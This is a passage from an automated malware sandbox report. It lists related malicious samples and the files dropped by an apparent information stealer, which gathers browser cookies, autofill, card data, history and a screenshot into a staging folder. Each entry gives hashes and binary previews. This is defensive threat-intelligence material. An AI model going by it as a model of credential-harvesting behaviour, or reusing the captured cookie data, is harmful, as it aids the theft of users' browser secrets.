37f463bf4616ecd445d4a1937da06e19	Purchasing Order.exe	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	XfcpsdMeEZ.exe	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	WGEcMZQA.dll	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	3ES3H87l9q.exe	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	48fl6271oClv7lfnOsBHvbLy.exe	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	vZltlkxU4MPM2p1gCNefeyXw.exe	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	vZltlkxU4MPM2p1gCNefeyXw.exe	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	cts0vDoWpt.dll	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	mzfAM4jLfv.dll	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	vdbb9MZTVz.dll	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	DHL DOCUMENTO DE ENVIO 10152021BCE.exe	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	EmployeeForm.docx	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	ntuser.cpl	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	ntuser.cpl	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	RFQ Material Standard BS 4360 GR. 40A43A.exe	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	rick-virus.htm	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	Odeme.swift.Telex.xls	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	Orden de compra n_ 393116209.exe	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	p2.exe	Get hash	malicious	Browse	88.99.75.82 162.159.130.233
	Xf5PjI7Ce2.exe	Get hash	malicious	Browse	88.99.75.82 162.159.130.233

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\ProgramData\freebl3.dll	gdpl2gPyv3.exe	Get hash	malicious	Browse
	dj3Rehx839.exe	Get hash	malicious	Browse
	mixshop_20211014-230224.exe	Get hash	malicious	Browse
	mUvDdSPT6Y.exe	Get hash	malicious	Browse
	b4VKxQN0um.exe	Get hash	malicious	Browse
	x8GpMU8C4I.exe	Get hash	malicious	Browse
	UyyDLuj9M5.exe	Get hash	malicious	Browse
	Hhfx4z3Jrt.exe	Get hash	malicious	Browse
	GR01DtRd0N.exe	Get hash	malicious	Browse
	0q3K4qJqQT.exe	Get hash	malicious	Browse
	SecuriteInfo.com.Ransom.Stop.Z5.27157.exe	Get hash	malicious	Browse
	zrArDsoum0.exe	Get hash	malicious	Browse
	UZWdHg3hWA.exe	Get hash	malicious	Browse
	LBJiq1QBaH.exe	Get hash	malicious	Browse
	HJmXSL9b6P.exe	Get hash	malicious	Browse
	jtht8EV6uw.exe	Get hash	malicious	Browse
	buIKlB688e.exe	Get hash	malicious	Browse
	Cu71vDdE5w.exe	Get hash	malicious	Browse
	20znh7W3Y1.exe	Get hash	malicious	Browse
	SZIJ791077 Brazil.xlsx	Get hash	malicious	Browse

Created / dropped Files

C:\ProgramData\VKOTTYY7FG6Q1H0K.exe Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	7079424
Entropy (8bit):	6.2785396823769615
Encrypted:	false
SSDEEP:	98304:irDWx+sEyGH9uTxld4arwlwZ6szR4QR66CxVCiKjjnteQxNGJO1Ik9tItz2t4e:iWx+sUH9oXdfrwknr+VCvnteQaOIkp
MD5:	D9C2993126C94CCFD546F3A9F3F84AB5
SHA1:	9FD3A5EF9D341B95352394D3795CD4EFBB23C62F
SHA-256:	77CE302FDA0F50D3ECBF90A2A66820038E92D191022BE38B1FFE3988A8B8D3D2
SHA-512:	AEAC9B7D02563C226D42FB506CBE1B49B4918D75D121022B380880CC0ABFCDC2A497EB8DEC1B1BB6A42406E592874AEDBCB2FD82E575F0E20D92286BBE9F6D16
Malicious:	true
Reputation:	low
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L..."..[..................k...........l.. ... l...@.. .......................`l...........`...................................l.W.... l......................@l...................................................... ............... ..H............text.....k.. ....k................. ..`.rsrc........ l.......l.............@..@.reloc.......@l.......l.............@..B..................l.....H.......`lk.$.......-...P....uh..........................................m..H`..gl...Q.K..j......<..^.N....l...K.oq....)..n.....1.#'.....-.z.GO.<,^....'atu.z....;..m#.f..Z.].:....\|.........F.'...\{j.H......:..~8.). ,.q]Y...W..D...3.Y...1.N......0....".;..r...R.U.....@K......{.....Cm...j.W.....GBAv..n...9....z\U..+.2.n.._.I(&.9..".~^`........-.P5.<D.c5z.$.......\|:t#..y....E3...e".V.....<.C..#$7..,.L....\|P?.k......z. ......!.'..........KA"L.p*..xD...!.;..I..n

C:\ProgramData\VKOTTYY7FG6Q1H0K.exe:Zone.Identifier Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	16
Entropy (8bit):	3.452819531114783
Encrypted:	false
SSDEEP:	3:Rs2lM9n:K2W9n
MD5:	93E357749C1770188119BDA62467BD23
SHA1:	D296E9961918F3350D15E659735BA3BC731BE11C
SHA-256:	43BDCDD2C6DDA95363575BD475B28C3A2F80D16900177404CE8DC5981848890E
SHA-512:	12C53E1E35FAB0E2D8BBE2265858C19BA0FE37EE2F1108459FEACC5D0DE8115E9AF821F136EF2128D5557CB5170AAC3692A6405A5B6B04BE3EEAEF002A7E9570
Malicious:	true
Reputation:	moderate, very likely benign file
Preview:	:Zone.Identifier

C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\d06ed635-68f6-4e9a-955c-4899f5f57b9a8242810190.zip Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	Zip archive data, at least v2.0 to extract
Category:	dropped
Size (bytes):	85018
Entropy (8bit):	7.989668707169286
Encrypted:	false
SSDEEP:	1536:NX8CkV9BPdf9Yj+iKoHlCkBTlaj+bfE86ZitGMd1D9rDH3bRc0fq75x:NsC2BPdCSi7sGDEZYNrzbRcv5x
MD5:	3F9F3B6E8DCC456E92035FC56E7618A6
SHA1:	4DC1448D95F50DBF9E1854E736BF30AD1196F0A6
SHA-256:	3330B16C8A138E1968ADEA6DFE13B433CE4D1D204216E696267A8B9AED19AD51
SHA-512:	DF248CCCA8B00DABD2249707FFE8AEBE676CC4B046EA1C762C37735AD2B3E8980A6DDC17841D42D4B1D705AA822B4E7D87750E2FA67856CD17EC4ED1C707AFA6
Malicious:	false
Reputation:	low
Preview:	PK..........PS............#.../Autofill/Google Chrome_Default.txtUT....eka.eka.eka..PK..........PS................/CC/Google Chrome_Default.txtUT....eka.eka.eka..PK..........PS................/Cookies/Edge_Cookies.txtUT....eka.eka.eka..PK..........PST.2.........".../Cookies/Google Chrome_Default.txtUT....eka.eka.eka-..n. ...K.)t....%H...".ysV.W..5D....]..j.u.w..=z.e.=.!.P......x..>.E.V1.:=.E>R.QSD.U..k.....N..:;]~j.......l,.A..!S_.L.A..pS..'.\|.wjOi..a...6g..<...mw....I4.X..F4o'.....s.Kz..^o..[q..-...PK..........PS................/Cookies/IE_Cookies.txtUT....eka.eka.eka..PK..........PS............$.../Downloads/Google Chrome_Default.txtUT....eka.eka.eka..PK..........PS................/Files/Default.zipUT....eka.eka.ekaPK....................PK..........PS............".../History/Google Chrome_Default.txtUT....eka.eka.eka..PK..........PS.>..s...y0....../information.txtUT....eka.eka.eka.Z.r.........H...H...(q,+....MB2k....vg.o..e./.C..#.RDR.m.8...\|8.8..W...;....l4.GN";..$.

C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\Cookies\Google Chrome_Default.txt Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	218
Entropy (8bit):	5.753991094325761
Encrypted:	false
SSDEEP:	6:PkopYjdhX0/tbD2Pdp9TaMbl/XyXqkxcP/Zy:copYxhHveaPx4cP/o
MD5:	01E689A15E7D09E945EE1A10E65740D9
SHA1:	75DAB7380AD6D001CD397F8C3D19CDE76AF4FF62
SHA-256:	8A7A8D8659BF0FE6BAF6DE8CCA6C8A8D0CCA6E7511DD9321660945A53C21C16D
SHA-512:	ADB9D0923A2EDB40105B0777880575BF5933462805E02C32BE9593DF086FF530C000392930F82D4C53B9112ED79BC351677028CBBAC84AFFA1CFD4EDED9EEE19
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.google.com.FALSE./.FALSE.1617282895.NID.204=lnU8rUIoxvWmSnStHN12ZO72aUiWVV1axeN4DtOTKTfvcrldjVWnMTIQIS8iJiRN9UHb6IUY-QDONDNofBZR-n0DF-PM3FrKHL6vfmJVykmJ7r1MH14-Wacprxo-dlNZMAV5ps4W2FLalvE0BMvycvUBSFkTfeWy7vzxBOBIFRE..

C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\Files\Default.zip Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	22
Entropy (8bit):	1.0476747992754052
Encrypted:	false
SSDEEP:	3:pjt/l:Nt
MD5:	76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:	B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:	8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:	5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:	false
Preview:	PK....................

C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\information.txt Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	ISO-8859 text, with very long lines, with CRLF line terminators
Category:	dropped
Size (bytes):	12409
Entropy (8bit):	5.3148552410854775
Encrypted:	false
SSDEEP:	192:zvOIOIpoHQougZi+T0DuRJEiXsUK7UVq//jiP2wkppgBdQXRsg8qbNqqN:axa7WZi+Qu0ppgUX2MboqN
MD5:	C252B0F16A80AFC9F1258B71F5ADB3EC
SHA1:	82661CBC50812C288765FD1A0FAF2F9E76663FB3
SHA-256:	C8DEEE9B5B9787483EEE1A0ADD1451C68333F629DC7346D877320C0763A9E26F
SHA-512:	AF413D183AE1E165CB04C64113E6E51333EEC4766872B408F0A993DCC78E56634B0CAC9818834043C3123E8F0F380C099180C51749C8E6F7278712F580704B5D
Malicious:	false
Preview:	Version: 41.3....Date: Sat Oct 16 16:53:29 2021..MachineID: d06ed635-68f6-4e9a-955c-4899f5f57b9a..GUID: {e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}..HWID: d06ed635-68f6-4e9a-955c-90ce-806e6f6e6963....Path: C:\Users\user\Desktop\MSQNZmmg2F.exe ..Work Dir: C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T ....Windows: Windows 10 Pro [x64]..Computer Name: 899552..User Name: user..Display Resolution: 1280x1024..Display Language: en-US..Keyboard Languages: English (United States)..Local Time: 16/10/2021 16:53:29..TimeZone: UTC-8....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard: Microsoft Basic Display Adapter....[Processes]..---------- System [4]..------------------------------ Registry [88]..- smss.exe [300]..- csrss.exe [396]..- wininit.exe [468]..- csrss.exe [484]..- services.exe [560]..- winlogon.exe [568]..- lsass.exe [584]..- fontdrvhost.exe [684]..- fontdrvhost.exe [692]..- svchost.exe [716]..- svchost.exe [792]..- svcho

C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\screenshot.jpg Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, frames 3
Category:	dropped
Size (bytes):	84283
Entropy (8bit):	7.899452035684429
Encrypted:	false
SSDEEP:	1536:CFhuuYvig91z4LPkA7hbsyS+lwXQoHdQ0mNJ1Rb1tl8lQKG5+r8KkHQfj20F6nbk:IhvYvigDz4Lc6hbp7lwAoHXqB1n8dG52
MD5:	3BE9D288BF873A8456F7433399617035
SHA1:	DB3DA8C96B452CA99A5BA76EF669E7556CF591E5
SHA-256:	BFCCB93AE2B6BB49FAFBC8076CAD2CD964B2E3083F9CD48C1C723DF9FB0A348E
SHA-512:	CC41953AAFEDC33D7D72D116AA710074539CCE6E7977D8629A2C1854A0DE02CFB79C8A6647866D32CD856BA4F545FE62D102A87745293FBFE1054EE842722EF3
Malicious:	false
Preview:	......JFIF.....`.`.....C................................... $.' ",#..(7),01444.'9=82<.342...C...........2!.!22222222222222222222222222222222222222222222222222..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..01KK...lq\....xcS.m..#Hm.....T......<!...wq5...v1.?S.....rHj-.U:...5............\|..+.......}...<.>...H.......Wo.CK`/l.1./...C...W.....,1....R.0.W.A.:.....X.l..1lN23....._....m.....'.........S.. ..W....'.c....1....5.5.}j.Ly..k;.\...q.U..Q...bgJpW.(QKI]&b.QE.&(.._.C.....B...-..h.Dh......{..J*.qNN...Z......?......................./.H.v..O.\|......I"]Z...I.y..[

C:\ProgramData\WTJ2DGSZXZQ079R9KJ5B00J1T\files\temp Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	SQLite 3.x database, last written using SQLite version 3032001
Category:	dropped
Size (bytes):	73728
Entropy (8bit):	1.1874185457069584
Encrypted:	false
SSDEEP:	96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
MD5:	72A43D390E478BA9664F03951692D109
SHA1:	482FE43725D7A1614F6E24429E455CD0A920DF7C
SHA-256:	593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
SHA-512:	FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
Malicious:	false
Preview:	SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\freebl3.dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	334288
Entropy (8bit):	6.807000203861606
Encrypted:	false
SSDEEP:	6144:C8YBC2NpfYjGg7t5xb7WOBOLFwh8yGHrIrvqqDL6XPowD:CbG7F35BVh8yIZqn65D
MD5:	EF2834AC4EE7D6724F255BEAF527E635
SHA1:	5BE8C1E73A21B49F353C2ECFA4108E43A883CB7B
SHA-256:	A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
SHA-512:	C6EA0E4347CBD7EF5E80AE8C0AFDCA20EA23AC2BDD963361DFAF562A9AED58DCBC43F89DD826692A064D76C3F4B3E92361AF7B79A6D16A75D9951591AE3544D2
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: gdpl2gPyv3.exe, Detection: malicious, Browse Filename: dj3Rehx839.exe, Detection: malicious, Browse Filename: mixshop_20211014-230224.exe, Detection: malicious, Browse Filename: mUvDdSPT6Y.exe, Detection: malicious, Browse Filename: b4VKxQN0um.exe, Detection: malicious, Browse Filename: x8GpMU8C4I.exe, Detection: malicious, Browse Filename: UyyDLuj9M5.exe, Detection: malicious, Browse Filename: Hhfx4z3Jrt.exe, Detection: malicious, Browse Filename: GR01DtRd0N.exe, Detection: malicious, Browse Filename: 0q3K4qJqQT.exe, Detection: malicious, Browse Filename: SecuriteInfo.com.Ransom.Stop.Z5.27157.exe, Detection: malicious, Browse Filename: zrArDsoum0.exe, Detection: malicious, Browse Filename: UZWdHg3hWA.exe, Detection: malicious, Browse Filename: LBJiq1QBaH.exe, Detection: malicious, Browse Filename: HJmXSL9b6P.exe, Detection: malicious, Browse Filename: jtht8EV6uw.exe, Detection: malicious, Browse Filename: buIKlB688e.exe, Detection: malicious, Browse Filename: Cu71vDdE5w.exe, Detection: malicious, Browse Filename: 20znh7W3Y1.exe, Detection: malicious, Browse Filename: SZIJ791077 Brazil.xlsx, Detection: malicious, Browse
Preview:	MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$........./...AV..AV..AV...V..AV].@W..AV.1.V..AV].BW..AV].DW..AV].EW..AV..@W..AVO.@W..AV..@V.AVO.BW..AVO.EW..AVO.AW..AVO.V..AVO.CW..AVRich..AV........................PE..L....b.[.........."!.........f......)........................................p.......s....@.........................p...P............@..x....................P......0...T...............................@...............8............................text...t........................... ..`.rdata..............................@..@.data...,H..........................@....rsrc...x....@......................@..@.reloc.......P......................@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\mozglue.dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........U..;..;..;.....;.W....;...8..;...?..;...:..;...>..;...:...;..:.w.;...?..;...>..;...;..;......;...9..;.Rich.;.........................PE..L...._.[.........."!.....z...................................................@.......3....@A........................@...t.......,.... ..x....................0..h.......T...................T.......h...@...................l........................text....x.......z.................. ..`.rdata..^e.......f...~..............@..@.data...............................@....didat..8...........................@....rsrc...x.... ......................@..@.reloc..h....0......................@..B........................................................................................................................................................................................................................................

C:\ProgramData\msvcp140.dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	440120
Entropy (8bit):	6.652844702578311
Encrypted:	false
SSDEEP:	12288:Mlp4PwrPTlZ+/wKzY+dM+gjZ+UGhUgiW6QR7t5s03Ooc8dHkC2es9oV:Mlp4PePozGMA03Ooc8dHkC2ecI
MD5:	109F0F02FD37C84BFC7508D4227D7ED5
SHA1:	EF7420141BB15AC334D3964082361A460BFDB975
SHA-256:	334E69AC9367F708CE601A6F490FF227D6C20636DA5222F148B25831D22E13D4
SHA-512:	46EB62B65817365C249B48863D894B4669E20FCB3992E747CD5C9FDD57968E1B2CF7418D1C9340A89865EADDA362B8DB51947EB4427412EB83B35994F932FD39
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........A.........V5=......A.....;........."...;......;......;.......;.......;......;.-....;......Rich...........PE..L....8'Y.........."!................P........ ......................................az....@A.........................C.......R..,....................x..8?......4:...f..8............................(..@............P.......@..@....................text...r........................... ..`.data....(... ......................@....idata..6....P....... ..............@..@.didat..4....p.......6..............@....rsrc................8..............@..@.reloc..4:.......<...<..............@..B........................................................................................................................................................................................................................................................................

C:\ProgramData\nss3.dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1246160
Entropy (8bit):	6.765536416094505
Encrypted:	false
SSDEEP:	24576:Sb5zzlswYNYLVJAwfpeYQ1Dw/fEE8DhSJVIVfRyAkgO6S/V/jbHpls4MSRSMxkoo:4zW5ygDwnEZIYkjgWjblMSRSMqH
MD5:	BFAC4E3C5908856BA17D41EDCD455A51
SHA1:	8EEC7E888767AA9E4CCA8FF246EB2AACB9170428
SHA-256:	E2935B5B28550D47DC971F456D6961F20D1633B4892998750140E0EAA9AE9D78
SHA-512:	2565BAB776C4D732FFB1F9B415992A4C65B81BCD644A9A1DF1333A269E322925FC1DF4F76913463296EFD7C88EF194C3056DE2F1CA1357D7B5FE5FF0DA877A66
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......#.4.g.Z.g.Z.g.Z.n...s.Z..[.e.Z..B..c.Z..Y.j.Z.._.m.Z..^.l.Z.E.[.o.Z..[.d.Z.g.[..Z..^.m.Z..Z.f.Z....f.Z..X.f.Z.Richg.Z.................PE..L....b.[.........."!................w........................................@............@..................................=..T.......p........................}..p...T..............................@............................................text............................... ..`.rdata...R.......T..................@..@.data...tG...`..."...B..............@....rsrc...p............d..............@..@.reloc...}.......~...h..............@..B........................................................................................................................................................................................................................................................................................

C:\ProgramData\softokn3.dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\ProgramData\vcruntime140.dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	83784
Entropy (8bit):	6.890347360270656
Encrypted:	false
SSDEEP:	1536:AQXQNgAuCDeHFtg3uYQkDqiVsv39niI35kU2yecbVKHHwhbfugbZyk:AQXQNVDeHFtO5d/A39ie6yecbVKHHwJF
MD5:	7587BF9CB4147022CD5681B015183046
SHA1:	F2106306A8F6F0DA5AFB7FC765CFA0757AD5A628
SHA-256:	C40BB03199A2054DABFC7A8E01D6098E91DE7193619EFFBD0F142A7BF031C14D
SHA-512:	0B63E4979846CEBA1B1ED8470432EA6AA18CCA66B5F5322D17B14BC0DFA4B2EE09CA300A016E16A01DB5123E4E022820698F46D9BAD1078BD24675B4B181E91F
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........NE...E...E.....".G...L.^.N...E...l.......U.......V.......A......._.......D.....2.D.......D...RichE...........PE..L....8'Y.........."!......... ...............................................@............@A......................................... ..................H?...0..........8...............................@............................................text............................... ..`.data...D...........................@....idata..............................@..@.rsrc........ ......................@..@.reloc.......0......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\VKOTTYY7FG6Q1H0K.exe.log Download File
Process:	C:\ProgramData\VKOTTYY7FG6Q1H0K.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	2242
Entropy (8bit):	5.346348901947171
Encrypted:	false
SSDEEP:	48:MxHKXeHKlEHU0YHKhQnouHIW7HKj2HKovitHoxHhAHKzv7HD8mHG1qHjHKs:iqXeqm00YqhQnouRqj2qoKtIxHeqzj79
MD5:	D79AC3AA9C4BCF75114A42A75C514A4B
SHA1:	9192796F3BF928AE84599EB1BC567E0F313140BF
SHA-256:	E4A36EC8CDA7A74A2CDE485EBE00CB04CFBDB41E68AF0971743E2561AE873CEE
SHA-512:	E723ECFA119BEF4C2ECF21643AC15507A2C5A760835E591FECA98FFC6022ED2C165DA3D62DBF47CBC2556E7F7E88A610B096BC7D56467DC66B217BD07381033A
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"PresentationCore, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\PresentationCore\820a27781e8540ca263d835ec155f1a5\PresentationCore.ni.dll",0..3,"PresentationFramework, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Presentatio5ae0f00f#\889128adc9a7c9370e5e293f65060164\PresentationFramework.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"WindowsBase, Version=4.0.0.0, Culture=neutral, PublicKeyToken=31bf3856ad364e35","C:\Windows\assembly\NativeImages_v4.0.30319_32\Wi

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0MX4YUS9\softokn3[1].dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	144848
Entropy (8bit):	6.539750563864442
Encrypted:	false
SSDEEP:	3072:UAf6suip+d7FEk/oJz69sFaXeu9CoT2nIVFetBWsqeFwdMIo:p6PbsF4CoT2OeU4SMB
MD5:	A2EE53DE9167BF0D6C019303B7CA84E5
SHA1:	2A3C737FA1157E8483815E98B666408A18C0DB42
SHA-256:	43536ADEF2DDCC811C28D35FA6CE3031029A2424AD393989DB36169FF2995083
SHA-512:	45B56432244F86321FA88FBCCA6A0D2A2F7F4E0648C1D7D7B1866ADC9DAA5EDDD9F6BB73662149F279C9AB60930DAD1113C8337CB5E6EC9EED5048322F65F7D8
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 0%, Browse Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........l$...JO..JO..JO.u.O..JO?oKN..JO?oIN..JO?oON..JO?oNN..JO.mKN..JO-nKN..JO..KO~.JO-nNN..JO-nJN..JO-n.O..JO-nHN..JORich..JO........PE..L....b.[.........."!.........b...............................................P............@..........................................0..x....................@..`.......T...........................(...@...............l............................text.............................. ..`.rdata...D.......F..................@..@.data........ ......................@....rsrc...x....0......................@..@.reloc..`....@......................@..B........................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2K7JPOQS\mozglue[1].dll Download File
Process:	C:\Users\user\Desktop\MSQNZmmg2F.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	137168
Entropy (8bit):	6.78390291752429
Encrypted:	false
SSDEEP:	3072:7Gyzk/x2Wp53pUzPoNpj/kVghp1qt/dXDyp4D2JJJvPhrSeTuk:6yQ2Wp53iO/kVghp12/dXDyyD2JJJvPR
MD5:	8F73C08A9660691143661BF7332C3C27
SHA1:	37FA65DD737C50FDA710FDBDE89E51374D0C204A
SHA-256:	3FE6B1C54B8CF28F571E0C5D6636B4069A8AB00B4F11DD842CFEC00691D0C9CD
SHA-512:	0042ECF9B3571BB5EBA2DE893E8B2371DF18F7C5A589F52EE66E4BFBAA15A5B8B7CC6A155792AAA8988528C27196896D5E82E1751C998BACEA0D92395F66AD89
Malicious:	false
Antivirus:	Antivirus: Metadefender, Detection: 3%, Browse Antivirus: ReversingLabs, Detection: 0%
